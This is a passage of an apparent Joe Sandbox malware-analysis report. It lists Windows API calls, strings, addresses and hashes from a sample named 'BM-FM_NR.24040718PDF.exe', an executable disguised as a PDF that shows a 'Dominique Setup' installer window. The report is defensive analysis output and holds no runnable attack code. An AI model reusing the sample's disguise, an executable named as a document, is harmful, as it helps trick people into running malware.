                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                      • String ID: %s=%s$NUL$[Rename]
                                                                      • API String ID: 222337774-4148678300
                                                                      • Opcode ID: 1f98854de7e5c40725f23c70871346fb007f1980b568e50079ef848d7602898f
                                                                      • Instruction ID: 8a014ae25a2f57f4e7f496887e8afb480c0f68f452f449b39f33bde68a4ee9be
                                                                      • Opcode Fuzzy Hash: 1f98854de7e5c40725f23c70871346fb007f1980b568e50079ef848d7602898f
                                                                      • Instruction Fuzzy Hash: 5231F370604B19ABC2206B615D49F6B3A6CDF45758F14053AFE01F62D2DA7CB800CEAD
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe",76293410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405FF2
                                                                      • CharNextA.USER32(?,?,?,00000000), ref: 00405FFF
                                                                      • CharNextA.USER32(?,"C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe",76293410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406004
                                                                      • CharPrevA.USER32(?,?,76293410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406014
                                                                      Strings
                                                                      • *?|<>/":, xrefs: 00405FE2
                                                                      • "C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe", xrefs: 00405FD6
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F9B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: Char$Next$Prev
                                                                      • String ID: "C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 589700163-1445150382
                                                                      • Opcode ID: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                                                      • Instruction ID: 57e0f34d942670e43035b7c22e392f1a12bb14715b301cf1348a0c798ab9ef07
                                                                      • Opcode Fuzzy Hash: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                                                      • Instruction Fuzzy Hash: 8B112751809B932AFB3256244C00B7BBFD88F57760F19007BE8D5722C2D67C5D529B6D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetWindowLongA.USER32(?,000000EB), ref: 00403F98
                                                                      • GetSysColor.USER32(00000000), ref: 00403FB4
                                                                      • SetTextColor.GDI32(?,00000000), ref: 00403FC0
                                                                      • SetBkMode.GDI32(?,?), ref: 00403FCC
                                                                      • GetSysColor.USER32(?), ref: 00403FDF
                                                                      • SetBkColor.GDI32(?,?), ref: 00403FEF
                                                                      • DeleteObject.GDI32(?), ref: 00404009
                                                                      • CreateBrushIndirect.GDI32(?), ref: 00404013
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                      • String ID:
                                                                      • API String ID: 2320649405-0
                                                                      • Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                                      • Instruction ID: f3431a0ddd372d44177634c3e6640760e16b4c563197d04d055afd4279a4596b
                                                                      • Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                                      • Instruction Fuzzy Hash: F4219F71808705ABCB209F78DD48A4BBBF8AF41704B048A2AE996F26E0C734E904CB55
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GlobalFree.KERNEL32(00000000), ref: 1000234A
                                                                        • Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012CF,-1000404B,100011AB,-000000A0), ref: 10001234
                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 100022C3
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022D8
                                                                      • GlobalAlloc.KERNEL32(00000040,00000010), ref: 100022E7
                                                                      • CLSIDFromString.OLE32(00000000,00000000), ref: 100022F4
                                                                      • GlobalFree.KERNEL32(00000000), ref: 100022FB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13469690913.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000000.00000002.13469666290.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13469717075.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13469744190.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_10000000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                      • String ID:
                                                                      • API String ID: 3730416702-0
                                                                      • Opcode ID: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
                                                                      • Instruction ID: bfa8c22ebd78897ea4dc14f883c746723b208fa17a75ef0c69fbb79ff87ab60c
                                                                      • Opcode Fuzzy Hash: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
                                                                      • Instruction Fuzzy Hash: B541ABB1108311EFF320DFA48884B5BB7F8FF443D1F218529F946D61A9DB34AA448B61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 10001215: GlobalAlloc.KERNEL32(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                      • GlobalFree.KERNEL32(?), ref: 100024B5
                                                                      • GlobalFree.KERNEL32(00000000), ref: 100024EF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13469690913.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000000.00000002.13469666290.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13469717075.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13469744190.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_10000000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: Global$Free$Alloc
                                                                      • String ID:
                                                                      • API String ID: 1780285237-0
                                                                      • Opcode ID: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
                                                                      • Instruction ID: 4e6b36a645f71e2aed4a85f2c36ff1861f2741140ba068ae73f9b0a79c1593cf
                                                                      • Opcode Fuzzy Hash: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
                                                                      • Instruction Fuzzy Hash: EA319CB1504250EFF322CF64CCC4C6B7BBDEB852D4B124529FA4193168CB31AC94DB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040482E
                                                                      • GetMessagePos.USER32 ref: 00404836
                                                                      • ScreenToClient.USER32(?,?), ref: 00404850
                                                                      • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404862
                                                                      • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404888
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: Message$Send$ClientScreen
                                                                      • String ID: f
                                                                      • API String ID: 41195575-1993550816
                                                                      • Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                      • Instruction ID: 72a6dff9965abeea3fde93c43f55bc8d1d0b984f63b53e8c81f3052648e7bb03
                                                                      • Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                      • Instruction Fuzzy Hash: EC019275D00218BADB00DBA5DC41FFEBBBCAF45711F10412BBB10B61C0C7B4A5018BA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B9A
                                                                      • MulDiv.KERNEL32(0009DC8F,00000064,0009DE93), ref: 00402BC5
                                                                      • wsprintfA.USER32 ref: 00402BD5
                                                                      • SetWindowTextA.USER32(?,?), ref: 00402BE5
                                                                      • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BF7
                                                                      Strings
                                                                      • verifying installer: %d%%, xrefs: 00402BCF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                      • String ID: verifying installer: %d%%
                                                                      • API String ID: 1451636040-82062127
                                                                      • Opcode ID: f377c182e300eefdb83bb0ba9c57991093f425550345df3c4c3600326924e25d
                                                                      • Instruction ID: f77185bba9c57e6aa61c0c8aee9f592e237af7c43fbef78eddb3d4185353df7a
                                                                      • Opcode Fuzzy Hash: f377c182e300eefdb83bb0ba9c57991093f425550345df3c4c3600326924e25d
                                                                      • Instruction Fuzzy Hash: D001F471640208BBEF209F60DD09EAE3779EB04744F008039FA16B51D1D7B5A955DB59
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040271A
                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402736
                                                                      • GlobalFree.KERNEL32(?), ref: 0040276F
                                                                      • GlobalFree.KERNEL32(00000000), ref: 00402782
                                                                      • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040279A
                                                                      • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027AE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                      • String ID:
                                                                      • API String ID: 2667972263-0
                                                                      • Opcode ID: 77e67ac391457e8d004afc0bb320801bb8c14dfd16ab1e53836186cbf3f5f692
                                                                      • Instruction ID: 5d6717e5ef000630179c441ec4dabf90fe6e4dbd5b0bc7dedcefa97c90ee8361
                                                                      • Opcode Fuzzy Hash: 77e67ac391457e8d004afc0bb320801bb8c14dfd16ab1e53836186cbf3f5f692
                                                                      • Instruction Fuzzy Hash: 1D215E71800124BBCF216FA5CE49EAE7E79EF09324F14423AF910762D1D7795D418FA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • lstrlenA.KERNEL32(Dominique Setup: Installing,Dominique Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404624,000000DF,00000000,00000400,?), ref: 004047A7
                                                                      • wsprintfA.USER32 ref: 004047AF
                                                                      • SetDlgItemTextA.USER32(?,Dominique Setup: Installing), ref: 004047C2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                      • String ID: %u.%u%s%s$Dominique Setup: Installing
                                                                      • API String ID: 3540041739-3437835362
                                                                      • Opcode ID: 1472cf9e36570b38fa99e832c46bb30f5d20a58f0764e004e3f2a6e79c89f0d0
                                                                      • Instruction ID: 053aaa49463ee093dad042f908cd6657d31450f6c5b0c7846562dfb37f065ee1
                                                                      • Opcode Fuzzy Hash: 1472cf9e36570b38fa99e832c46bb30f5d20a58f0764e004e3f2a6e79c89f0d0
                                                                      • Instruction Fuzzy Hash: 0E11E473A041283BDB0065A99C45EAF3288DB82374F254237FA25F71D1EA78CC1286A8
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetWindowTextA.USER32(00000000,Dominique Setup), ref: 00403A0C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: TextWindow
                                                                      • String ID: "C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe"$1033$Dominique Setup$Dominique Setup: Installing
                                                                      • API String ID: 530164218-4136382539
                                                                      • Opcode ID: c35f14d8ae607f964b1d366d12cd70842dee39e56cae11f13a59ba4c30930c7f
                                                                      • Instruction ID: fbf6035dbb292e76ee93bcdc762ea67a79fb5cde0254510f453a1e05a67cff09
                                                                      • Opcode Fuzzy Hash: c35f14d8ae607f964b1d366d12cd70842dee39e56cae11f13a59ba4c30930c7f
                                                                      • Instruction Fuzzy Hash: 97110871B046109BC730AF56DC409737B6CEF89319368423FE801A73D1D639AD03CAA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetDlgItem.USER32(?), ref: 00401CE2
                                                                      • GetClientRect.USER32(00000000,?), ref: 00401CEF
                                                                      • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D10
                                                                      • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                                                                      • DeleteObject.GDI32(00000000), ref: 00401D2D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                      • String ID:
                                                                      • API String ID: 1849352358-0
                                                                      • Opcode ID: 7b3151235455efa7101d04b7e9aec4a9fd05a576d48d8a2a9df35770264f85f7
                                                                      • Instruction ID: 718a49c372d49eeeb619100b459207f1cde729867d9d835a9e14b5832590348d
                                                                      • Opcode Fuzzy Hash: 7b3151235455efa7101d04b7e9aec4a9fd05a576d48d8a2a9df35770264f85f7
                                                                      • Instruction Fuzzy Hash: 74F0E7B2A04114AFEB01EBE4DE88DAFB7BDEB54305B10447AF602F6191C7749D018B79
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetDC.USER32(?), ref: 00401D3B
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D48
                                                                      • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D57
                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401D68
                                                                      • CreateFontIndirectA.GDI32(0040A818), ref: 00401DB3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                      • String ID:
                                                                      • API String ID: 3808545654-0
                                                                      • Opcode ID: c2a9d05608db3b551cbe7321e8fd88224b197bc40f94a71f0fff53b7c1922a27
                                                                      • Instruction ID: ad7d238852a8d87b5aaa3e6a204337ae93e1cce4a0b470fbec170e72a625d374
                                                                      • Opcode Fuzzy Hash: c2a9d05608db3b551cbe7321e8fd88224b197bc40f94a71f0fff53b7c1922a27
                                                                      • Instruction Fuzzy Hash: EA01D632944340AFEB0177B0AE4EBAA3FB49759309F108479F201B62E2C6790052CF6F
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 004057A7
                                                                      • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 004057B0
                                                                      • lstrcatA.KERNEL32(?,00409014), ref: 004057C1
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004057A1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 2659869361-3355392842
                                                                      • Opcode ID: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                                      • Instruction ID: 31daa9478c60f2ec517fa6cf0afa0cd81b34b06dfe81de980877f4a94ee531a8
                                                                      • Opcode Fuzzy Hash: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                                      • Instruction Fuzzy Hash: 8ED0A762505D306BE21226155C09D8B2A08CF12740B044027F100B61E1C63C4D414FFD
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
